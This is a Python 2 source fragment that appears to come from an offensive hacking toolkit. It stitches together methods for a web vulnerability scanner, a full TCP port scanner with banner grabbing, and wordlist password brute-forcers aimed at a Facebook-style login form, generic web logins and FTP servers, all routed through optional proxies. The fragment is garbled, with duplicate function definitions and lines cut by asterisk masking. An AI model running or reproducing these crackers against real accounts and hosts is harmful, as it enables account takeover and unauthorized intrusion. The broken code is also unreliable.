def scan(self):
global br
global vuln_links
print "\n[+] Target: " + self.target
if self.verbose == 1:
print "[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_browser_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
print "\n[*] Checking anonymous FTP login..."
self.results = "Anonymous FTP login:\n"
self.results += self.FTPScan()
print "[*] Checking vulnerables links...\n"
self.grab_links()
if len(vuln_links) == 0:
self.results += "\nNo vulnerable links found"
print "[-] No vulnerable links found\n"
else:
if self.verbose_mode == 1:
print "[!] " + str(len(vuln_links)) + " vulnerable links found"
print "[*] Checking SQL vulnerability...\n"
self.results += "\nSQL vulnerability:\n"
self.results += self.SQLScan()
print "[*] Checking XSS vulnerability...\n"
self.results += "\nXSS vulnerability:\n"
self.results += self.XSSScan()
print "[*] Checking command injection vulnerability...\n"
self.results += "\nCommand injection vulnerability:\n"
self.results += self.CMDScan()
print "[*] Checking LFI vulnerability...n"
self.results += "\nLFI vulnerability:\n"
self.results += self.LFIScan()
print "[*] Checking RFI vulnerability...\n"
self.results += "\nRFI vulnerability:\n"
self.results += self.RFIScan()
def scan(self):
print "\n[+] Target: " + self.target
if self.verbose == 1:
print "[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_socket_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
pr = proxy("", "", "")
pr.set_no_proxy()
print
if self.verbose == 1:
print "[!] Scanning target...\n"
for port in range(65535):
try:
if pr.connect(self.target, port) == True:
pr.send("HEAD / HTTP/1.0\r\n\r\n")
banner = pr.recv(1024)
self.results += "%s/tcp open %s\n" % (
port, self.porttoservice(port))
print "[+] %s/tcp open %s" % (port,
self.porttoservice(port))
if banner != "":
print banner
self.results += banner + "\n"
except:
pass
if self.results == "":
self.results = "No open ports found"
print "[-] Failed to connect to target"
print "[-] " + self.results + "\n"
def crack(self):
print "\n[+] Target: " + self.target
if self.verbose == 1:
print "[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_browser_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
print
if self.verbose == 1:
print "[!] Connecting to target...\n"
br = browser()
try:
br.open(self.login_page)
if self.verbose == 1:
print "[!] Checking wordslists..."
passwords = open(self.wordslist, "r").readlines()
if self.verbose == 1:
print "[!] Attack started...\n"
for word in passwords:
password = word.replace("\n", "")
print "[*] Trying: " + password
br.select_form(nr=0)
br.form['email'] = self.target
br.form['pass'] = password
resp = br.submit()
if "login_attempt" not in resp.geturl():
self.results = "Password is " + password
print "[+] " + self.results
break
except:
self.results = "Failed to crack password"
print "[-] Failed to connect to target"
print "[-] " + self.results + "\n"
def grab_links(self):
print "\n[+] Target: " + self.target
if self.verbose == 1:
print "[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_browser_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
print
if self.verbose == 1:
print "[!] Connecting to target..."
br = browser()
try:
site = br.open(self.target)
src = site.read()
soup = BeautifulSoup(src, "lxml")
links = soup.find_all('a')
if self.verbose == 1:
print "[!] Found %d links\n" %(len(links))
for link in links:
print link.get("href")
except:
self.results = "No results found"
print "[-] Failed to connect to target"
print "[-] " + self.results + "\n"
def crack(self):
print "\n[+] Target: " + self.target
if self.verbose == 1:
print "[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_browser_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
print
if self.verbose == 1:
print "[!] Connecting to target..."
br = browser()
try:
br.open(self.login_page)
if self.verbose == 1:
print "[!] Checking wordslists..."
usernames = open(self.userslist, "r").readlines()
passwords = open(self.wordslist, "r").readlines()
if self.username != "":
for word in passwords:
password = word.replace("\n", "")
print "[*] Trying: " + password
br.select_form(nr=0)
br.form[self.user_form] = self.username
br.form[self.pass_form] = password
resp = br.submit()
if ("login"
not in resp.geturl()) or ("attempt"
not in resp.geturl()):
self.results = "Password is " + password
print "[+] " + self.results
break
else:
for user in usernames:
username = user.replace("\n", "")
print "[*] Trying username: "******"\n", "")
print "[*] Trying password: "******"login" not in resp.geturl()) or (
"attempt" not in resp.geturl()):
self.results = "Login is %s:%s" % (username,
password)
print "[+] " + self.results
break
except:
self.results = "Failed to crack password"
print "[-] " + self.results
def crack(self):
print "\n[+] Target: " + self.target
if self.username != "":
print "[+] Username: "******"[!] Checking proxy..."
if self.proxy != "":
hst, prt = parse_address(self.proxy)
pr = proxy(hst, prt, self.proxy_type)
if pr.set_socket_proxy() == True:
print "[+] Proxy: " + self.proxy
else:
print "[-] Invalid or dead proxy"
else:
print "[-] Proxy not set"
pr = proxy("", "", "")
pr.set_no_proxy()
print
if self.username == "":
try:
if pr.connect(self.target, self.port) == True:
if self.verbose == 1:
print "[!] Checking wordslists..."
usernames = open(self.userslist, "r").readlines()
passwords = open(self.wordslist, "r").readlines()
for user in usernames:
username = user.replace("\n", "")
print "[*] Trying username: "******"\n", "")
print "[*] Trying password: "******"USER " + username + "\r\n")
pr.recv(1024)
pr.send("PASS " + password + "\r\n")
r = pr.recv(1024)
if "230" in r:
self.results = "Login is %s:%s" % (username,
password)
print "[+] " + self.results
break
except:
self.results = "Failed to crack password"
print "[-] " + self.results
else:
try:
if pr.connect(self.target, self.port) == True:
if self.verbose == 1:
print "[!] Checking wordslists..."
passwords = open(self.wordslist, "r").readlines()
for word in passwords:
password = word.replace("\n", "")
print "[*] Trying: " + password
pr.send("USER " + self.username + "\r\n")
pr.recv(1024)
pr.send("PASS " + password + "\r\n")
r = pr.recv(1024)
if "230" in r:
self.results = "Password is " + password
print "[+] " + self.results
break
except:
self.results = "Failed to crack password"
print "[-] " + self.results